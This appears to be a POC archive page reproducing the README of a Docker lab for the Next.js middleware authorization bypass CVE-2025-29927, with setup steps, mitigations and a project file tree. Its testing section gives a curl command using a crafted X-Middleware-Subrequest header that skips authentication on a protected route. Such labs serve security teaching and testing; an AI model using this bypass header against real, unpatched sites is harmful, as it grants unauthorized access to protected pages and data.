关联漏洞
介绍
```markdown
# 🚨 NextJS-CVE-2025-29927-Docker-Lab
This repository contains a **Docker-based lab** environment to explore and demonstrate the **Next.js CVE-2025-29927** vulnerability in a controlled setting.
> ⚠️ **DISCLAIMER:** This lab is for educational and security research purposes only. Do not expose it to the public internet or use it in production.
---
## 📦 Features
- ✅ Vulnerable Next.js application
- ✅ Containerized with Docker
- ✅ Designed for local testing of CVE-2025-29927
- ✅ Includes pre-configured routes and UI
- ✅ Easy to set up and run
---
## 🛠 Prerequisites
Ensure you have the following installed:
- [Docker](https://www.docker.com/products/docker-desktop) (v20+)
- [Git](https://git-scm.com/downloads)
- Optional: [Node.js](https://nodejs.org/) if you plan to run outside Docker
---
## 🚀 Getting Started
Follow these steps to clone and run the lab:
### 1. Clone the Repository
```bash
git clone https://github.com/enochgitgamefied/NextJS-CVE-2025-29927-Docker-Lab.git
cd NextJS-CVE-2025-29927-Docker-Lab
```
### 2. Build and Run with Docker
```bash
docker-compose up --build
```
This will:
- Build the Docker image
- Start the vulnerable Next.js server
- Expose the app at [http://localhost:3000](http://localhost:3000)
---
## 📂 Folder Structure
```
.
├── app/ # Main Next.js app code
├── public/ # Static assets (images, etc.)
├── Dockerfile # Docker setup for app
├── docker-compose.yml # Compose configuration
├── .env # Environment variables (if any)
├── README.md # You are here
```
---
## 🧪 Testing the Vulnerability
# 🛡️ CVE-2025-29927 - Next.js Middleware Authorization Bypass
> ⚠️ **WARNING**: This documentation is for **educational and security research purposes** only. Do not deploy the vulnerable app in a production environment.
---
## 🔍 Overview
**CVE-2025-29927** is a critical authorization bypass vulnerability in Next.js middleware. It allows attackers to skip middleware-based authentication and access protected routes by manipulating the `X-Middleware-Subrequest` header.
---
## 🧪 Reproducing the Vulnerability
### 1. Accessing Protected Routes Without Authentication
Attempt to access a protected route, such as `/admin`, without any authentication:
```bash
curl http://localhost:3000/admin
```
**Expected Behavior**: Access is denied or redirected to an unauthorized page.
**Vulnerable Behavior**: Access is granted without authentication.
### 2. Bypassing Middleware Using `X-Middleware-Subrequest` Header
Send a request with the `X-Middleware-Subrequest` header to bypass middleware checks:
```bash
curl -H "X-Middleware-Subrequest: src/middleware:nowaf" http://localhost:3000/admin
```
**Result**: Middleware is bypassed, and access to the protected route is granted.
---
## 🛡️ Mitigation Strategies
### 1. Upgrade Next.js to a Patched Version
Update Next.js to one of the following versions where the vulnerability is fixed:
* 14.2.25
* 15.2.3
```bash
npm install next@latest
```
### 2. Implement Middleware Hardening
Enhance your middleware to validate requests properly and reject any with suspicious headers:
```javascript
import { NextResponse } from 'next/server';
export function middleware(request) {
const subrequestHeader = request.headers.get('x-middleware-subrequest');
if (subrequestHeader) {
return new NextResponse('Unauthorized', { status: 401 });
}
// Continue with normal processing
return NextResponse.next();
}
```
### 3. Configure Reverse Proxy to Strip Suspicious Headers
If you're using a reverse proxy (e.g., Nginx), configure it to remove the `X-Middleware-Subrequest` header from incoming requests:
```nginx
location / {
proxy_pass http://localhost:3000;
proxy_set_header X-Middleware-Subrequest "";
}
```
---
## 📚 References
* [NVD - CVE-2025-29927](https://nvd.nist.gov/vuln/detail/CVE-2025-29927)
* [Datadog Security Labs Analysis](https://securitylabs.datadoghq.com/articles/nextjs-middleware-auth-bypass/)
* [Vercel Postmortem](https://vercel.com/blog/postmortem-on-next-js-middleware-bypass)
This `VULNERABILITY.md` file provides a comprehensive guide to understanding and reproducing the CVE-2025-29927 vulnerability in a controlled environment. It also offers practical mitigation strategies to secure your Next.js applications against such exploits.
For a detailed demonstration and further insights into this vulnerability, you can refer to the full attack demo provided by Techtalkpine on the blog post which also is linked to the Youtube live demo: https://techtalkpine.com/2025/03/demo-for-cve-2025-29927-nextjs/
Let me know if you need assistance with any specific part of this setup or further clarification on the mitigation steps.
```
---
## 🧹 Tear Down
To stop and remove containers:
```bash
docker-compose down
```
---
## 📚 Resources
- [Next.js Docs](https://nextjs.org/docs)
- [Docker Docs](https://docs.docker.com/)
- [OWASP Top 10](https://owasp.org/www-project-top-ten/)
---
## ⚠️ Legal Disclaimer
This project is intended solely for educational and research purposes. You are responsible for using it in accordance with all applicable laws and ethical guidelines. The author is not liable for any misuse or damage caused.
文件快照
[4.0K] /data/pocs/c893a1666a57a0591be271e2ed7d8cd0d0e2a41e
├── [ 647] docker-compose.yml
├── [ 465] Dockerfile
├── [ 77] jsconfig.json
├── [4.0K] mysql-init
│ ├── [2.9K] 00_init_and_load.sql
│ ├── [ 295] addresses.csv
│ ├── [ 65] cart.csv
│ ├── [ 40] order_items.csv
│ ├── [ 108] orders.csv
│ ├── [ 130] products.csv
│ ├── [ 69] shipping_addresses.csv
│ └── [ 992] users.csv
├── [ 106] next.config.js
├── [ 895] package.json
├── [419K] package-lock.json
├── [ 82] postcss.config.js
├── [4.0K] public
│ ├── [ 295] addresses.csv
│ ├── [ 65] cart.csv
│ ├── [4.0K] images
│ │ ├── [ 26M] 01.png
│ │ ├── [ 30M] 02.png
│ │ ├── [ 33M] 03.png
│ │ ├── [ 13M] 04.png
│ │ ├── [4.0K] kids
│ │ │ ├── [ 50K] kids1.jpg
│ │ │ ├── [ 49K] kids2.jpg
│ │ │ ├── [ 51K] kids3.jpg
│ │ │ ├── [ 63K] kids4.jpg
│ │ │ ├── [ 84K] kids5.jpg
│ │ │ ├── [ 87K] kids6.jpg
│ │ │ └── [ 44K] kids7.jpg
│ │ ├── [4.0K] men
│ │ │ ├── [ 66K] men1.jpg
│ │ │ ├── [ 32K] men2.jpg
│ │ │ ├── [163K] men3.jpg
│ │ │ ├── [ 59K] men4.jpg
│ │ │ ├── [122K] men5.jpg
│ │ │ ├── [ 67K] men6.jpg
│ │ │ ├── [ 43K] men7.jpg
│ │ │ └── [ 22K] men8.jpg
│ │ └── [4.0K] women
│ │ ├── [ 32K] women1.jpg
│ │ ├── [ 93K] women2.jpg
│ │ ├── [ 62K] women3.jpg
│ │ ├── [110K] women4.jpg
│ │ ├── [ 20K] women5.jpg
│ │ ├── [ 26K] women6.jpg
│ │ ├── [ 59K] women7.jpg
│ │ └── [ 30K] women8.jpg
│ ├── [1.3K] next.svg
│ ├── [ 40] order_items.csv
│ ├── [ 108] orders.csv
│ ├── [ 130] products.csv
│ ├── [ 69] shipping_addresses.csv
│ ├── [ 992] users.csv
│ └── [ 629] vercel.svg
├── [5.3K] README.md
├── [4.0K] src
│ ├── [4.0K] app
│ │ ├── [4.0K] account
│ │ │ └── [8.1K] page.js
│ │ ├── [4.0K] admin
│ │ │ └── [1.1K] page.js
│ │ ├── [4.0K] admin-view
│ │ │ ├── [4.0K] add-product
│ │ │ │ └── [2.6K] page.js
│ │ │ ├── [4.0K] all-products
│ │ │ │ └── [ 302] page.js
│ │ │ ├── [ 205] layout.js
│ │ │ └── [6.5K] page.js
│ │ ├── [4.0K] api
│ │ │ ├── [4.0K] address
│ │ │ │ ├── [4.0K] add-new-address
│ │ │ │ │ └── [2.5K] route.js
│ │ │ │ ├── [4.0K] delete-address
│ │ │ │ │ └── [1.2K] route.js
│ │ │ │ ├── [4.0K] get-all-address
│ │ │ │ │ └── [2.6K] route.js
│ │ │ │ └── [4.0K] update-address
│ │ │ │ └── [1.2K] route.js
│ │ │ ├── [4.0K] admin
│ │ │ │ ├── [4.0K] all-products
│ │ │ │ │ └── [ 763] route.js
│ │ │ │ ├── [4.0K] delete-product
│ │ │ │ │ └── [1.2K] route.js
│ │ │ │ ├── [4.0K] orders
│ │ │ │ │ ├── [4.0K] get-all-orders
│ │ │ │ │ │ └── [1.1K] route.js
│ │ │ │ │ └── [4.0K] update-order
│ │ │ │ │ └── [1.4K] route.js
│ │ │ │ ├── [4.0K] product-by-category
│ │ │ │ │ └── [ 801] route.js
│ │ │ │ ├── [4.0K] product-by-id
│ │ │ │ │ └── [ 969] route.js
│ │ │ │ └── [4.0K] update-product
│ │ │ │ └── [1.5K] route.js
│ │ │ ├── [4.0K] cart
│ │ │ │ ├── [4.0K] add-to-cart
│ │ │ │ │ └── [1.9K] route.js
│ │ │ │ ├── [4.0K] all-cart-items
│ │ │ │ │ └── [1.2K] route.js
│ │ │ │ └── [4.0K] delete-from-cart
│ │ │ │ └── [1.2K] route.js
│ │ │ ├── [4.0K] login
│ │ │ │ └── [2.2K] route.js
│ │ │ ├── [4.0K] order
│ │ │ │ ├── [4.0K] create-order
│ │ │ │ │ └── [1.1K] route.js
│ │ │ │ ├── [4.0K] get-all-orders
│ │ │ │ │ └── [1.1K] route.js
│ │ │ │ └── [4.0K] order-details
│ │ │ │ └── [1.2K] route.js
│ │ │ ├── [4.0K] register
│ │ │ │ └── [1.8K] route.js
│ │ │ └── [4.0K] stripe
│ │ │ └── [1.1K] route.js
│ │ ├── [4.0K] cart
│ │ │ └── [2.5K] page.js
│ │ ├── [4.0K] checkout
│ │ │ └── [9.9K] page.js
│ │ ├── [ 25K] favicon.ico
│ │ ├── [ 652] globals.css
│ │ ├── [ 595] layout.js
│ │ ├── [4.0K] login
│ │ │ └── [5.1K] page.js
│ │ ├── [1.8K] middleware.js
│ │ ├── [4.0K] orders
│ │ │ ├── [4.0K] [order-details]
│ │ │ │ └── [7.2K] page.js
│ │ │ └── [4.4K] page.js
│ │ ├── [7.0K] page.js
│ │ ├── [4.0K] product
│ │ │ ├── [4.0K] [details]
│ │ │ │ └── [ 360] page.js
│ │ │ └── [4.0K] listing
│ │ │ ├── [4.0K] all-products
│ │ │ │ └── [2.9K] page.js
│ │ │ ├── [4.0K] kids
│ │ │ │ └── [1.7K] page.js
│ │ │ ├── [4.0K] men
│ │ │ │ └── [1.7K] page.js
│ │ │ └── [4.0K] women
│ │ │ └── [1.7K] page.js
│ │ ├── [4.0K] register
│ │ │ └── [5.2K] page.js
│ │ └── [4.0K] unauthorized-page
│ │ └── [1016] page.js
│ ├── [4.0K] assets
│ │ ├── [ 26M] 01.png
│ │ ├── [ 25M] 02.png
│ │ ├── [ 33M] 03.png
│ │ └── [ 10M] 04.png
│ ├── [4.0K] components
│ │ ├── [ 880] AdminProtector.js
│ │ ├── [4.0K] CartModal
│ │ │ └── [5.7K] index.js
│ │ ├── [4.0K] CommonCart
│ │ │ └── [5.7K] index.js
│ │ ├── [4.0K] CommonDetails
│ │ │ └── [5.3K] index.js
│ │ ├── [4.0K] CommonListing
│ │ │ ├── [1.0K] index.js
│ │ │ ├── [4.0K] ProductButtons
│ │ │ │ └── [3.3K] index.js
│ │ │ └── [4.0K] ProductTile
│ │ │ └── [1.5K] index.js
│ │ ├── [4.0K] CommonModal
│ │ │ └── [2.2K] index.js
│ │ ├── [4.0K] FormElements
│ │ │ ├── [4.0K] InputComponent
│ │ │ │ └── [ 610] index.js
│ │ │ ├── [4.0K] SelectComponent
│ │ │ │ └── [ 940] index.js
│ │ │ └── [4.0K] TileComponent
│ │ │ └── [ 930] index.js
│ │ ├── [4.0K] Loader
│ │ │ └── [4.0K] componentlevel
│ │ │ └── [ 362] index.js
│ │ ├── [4.0K] Navbar
│ │ │ └── [6.3K] index.js
│ │ └── [4.0K] Notification
│ │ └── [ 405] index.js
│ ├── [4.0K] context
│ │ └── [3.7K] index.js
│ ├── [4.0K] database
│ │ └── [ 942] index.js
│ ├── [4.0K] middleware
│ │ └── [ 863] AuthUser.js
│ ├── [1.9K] middleware.js
│ ├── [4.0K] models
│ │ ├── [2.4K] address.js
│ │ ├── [2.5K] cart.js
│ │ ├── [3.8K] order.js
│ │ ├── [2.7K] product.js
│ │ └── [1.4K] user.js
│ ├── [4.0K] services
│ │ ├── [4.0K] address
│ │ │ └── [1.8K] index.js
│ │ ├── [4.0K] cart
│ │ │ └── [1.1K] index.js
│ │ ├── [4.0K] login
│ │ │ └── [1.0K] index.js
│ │ ├── [4.0K] order
│ │ │ └── [1.8K] index.js
│ │ ├── [4.0K] product
│ │ │ └── [2.1K] index.js
│ │ ├── [4.0K] register
│ │ │ └── [ 372] index.js
│ │ └── [4.0K] stripe
│ │ └── [ 434] index.js
│ └── [4.0K] utils
│ ├── [ 313] cookies.js
│ └── [4.1K] index.js
├── [ 480] tailwind.config.js
└── [3.6K] VULNERABILITY.md
83 directories, 133 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。